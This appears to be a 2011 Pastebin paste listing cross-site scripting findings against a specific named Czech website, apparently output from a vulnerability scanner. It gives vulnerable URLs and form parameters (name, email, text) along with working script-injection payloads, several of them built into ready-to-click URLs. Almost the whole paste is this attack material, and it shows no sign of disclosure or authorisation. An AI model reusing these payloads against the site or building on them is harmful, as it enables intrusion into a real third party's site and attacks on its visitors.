API tools faq
paste
Advertisement
sroub3k

blockart.cz

sroub3k
Sep 4th, 2011
255
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.78 KB | None | 0 0
raw download clone embed print report
  1. XSS
  2.  
  3. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  4.  
  5. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  6. Parameter Name: jmeno
  7. Parameter Type: Post
  8. Attack Pattern: '"--></style></script><script>alert(0x000421)</script>
  9.  
  10. http://www.blockart.cz/index.php?sekce='"--></style></script><script>alert(0x0002BA)</script>&cref=11
  11. http://www.blockart.cz/index.php?sekce='"--></style></script><script>alert(0x0002B9)</script>&cislo=1
  12. http://www.blockart.cz/index.php?sekce="></style><script>alert(9)</script>&cislo=1
  13. http://www.blockart.cz/index.php?sekce='"--></style></script><script>alert(0x000310)</script>
  14. http://www.blockart.cz/index.php?sekce=3&cislo='"--></style></script><script>alert(0x000436)</script>
  15. http://www.blockart.cz/index.php?sekce=3&cislo="><script>alert(9)</script>
  16. http://www.blockart.cz/index.php?sekce=reference&cref='"--></style></script><script>alert(0x000447)</script>
  17.  
  18. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  19. Parameter Name: email
  20. Parameter Type: Post
  21. Attack Pattern: '"--></style></script><script>alert(0x000422)</script>
  22.  
  23. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  24. Parameter Name: email
  25. Parameter Type: Post
  26. Attack Pattern: '"--></style></script><script>alert(0x00043A)</script>
  27.  
  28. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  29. Parameter Name: jmeno
  30. Parameter Type: Post
  31. Attack Pattern: '"--></style></script><script>alert(0x00043B)</script>
  32.  
  33. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  34. Parameter Name: text
  35. Parameter Type: Post
  36. Attack Pattern: '"--></style></script><script>alert(0x000424)</script>
  37.  
  38. http://www.blockart.cz/texty/dotaz.php?akce=odeslat
  39. Parameter Name: text
  40. Parameter Type: Post
  41. Attack Pattern: '"--></style></script><script>alert(0x00043C)</script>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!